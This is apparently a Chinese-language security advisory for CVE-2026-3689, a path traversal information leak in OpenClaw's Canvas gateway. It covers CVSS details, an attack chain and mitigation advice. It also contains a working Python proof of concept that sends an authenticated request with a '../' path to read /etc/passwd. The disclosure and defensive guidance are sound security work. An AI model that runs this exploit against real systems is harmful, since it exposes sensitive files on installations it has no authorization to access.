CVE-2026-3689 OpenClaw路径遍历信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-3689

漏洞类型

路径遍历, 信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

CVE-2026-3689是OpenClaw Canvas组件中发现的路径遍历信息泄露漏洞。该漏洞允许远程攻击者在受影响的OpenClaw系统安装上披露敏感信息。成功利用此漏洞需要攻击者具备低权限的身份认证。攻击者可以通过构造恶意请求，利用该缺陷在服务账户的上下文中读取敏感文件，从而对系统机密性造成严重威胁。

技术细节

该漏洞的根本原因在于OpenClaw的canvas gateway端点在处理用户提交的path参数时，未能实施有效的输入验证机制。系统直接将未经过滤的用户输入用于文件系统操作，导致存在路径遍历风险。攻击者可以通过构造包含特殊字符（如“../”）的恶意路径参数，欺骗服务器访问Web根目录之外的敏感文件。由于缺乏安全检查，攻击者能够以运行该服务的服务账户权限读取任意文件，从而造成敏感信息泄露。虽然利用此漏洞需要具备低权限账户，但结合其网络攻击向量和无需用户交互的特性，这使得已认证的攻击者能够轻易地侦察服务器内部结构并窃取数据。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者识别目标运行的是OpenClaw系统，并获取有效的低权限账户凭证（漏洞利用需要PR:L）。

STEP 2

2. 构造恶意请求

攻击者向受影响的OpenClaw Canvas gateway端点发送特制的HTTP请求，在path参数中插入路径遍历字符（如../）。

STEP 3

3. 服务器端处理

服务器接收请求，由于未对path参数进行充分验证，直接将其用于文件系统操作，导致路径遍历成功。

STEP 4

4. 敏感信息泄露

服务器以服务账户的上下文权限读取并返回攻击者指定路径的文件内容（如/etc/passwd或配置文件），造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_vulnerability(target_url, session_cookie):
    """
    Proof of Concept for CVE-2026-3689
    Exploits path traversal in OpenClaw Canvas Gateway endpoint.
    """
    # The endpoint handling the canvas gateway
    endpoint = f"{target_url}/api/canvas_gateway"
    
    # Headers including the authentication cookie
    headers = {
        "Cookie": session_cookie,
        "User-Agent": "CVE-2026-3689-POC"
    }
    
    # Malicious payload using path traversal sequences
    # Attempting to read /etc/passwd on Linux systems
    payload = {
        "path": "../../../../../../etc/passwd"
    }
    
    try:
        response = requests.get(endpoint, headers=headers, params=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            # Check if the response content looks like a file
            if "root:" in response.text:
                print("[!] Vulnerability exploited successfully! Sensitive data disclosed:")
                print(response.text)
            else:
                print("[-] Target might be patched or file not found.")
                print(response.text[:200])
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://192.168.1.100:8080"
    # Replace with a valid authenticated session cookie
    auth_cookie = "session_id=authenticated_user_token_here" 
    exploit_vulnerability(target, auth_cookie)

影响范围

OpenClaw (具体受影响版本请参考官方安全公告GHSA-jq4x-98m3-ggq6)

防御指南

临时缓解措施

如果不能立即升级，建议在网络层面限制对canvas gateway端点的访问权限，仅允许受信任的IP地址连接。同时，部署Web应用防火墙（WAF）规则，检测并拦截包含路径遍历特征（如../或%2e%2e/）的恶意请求。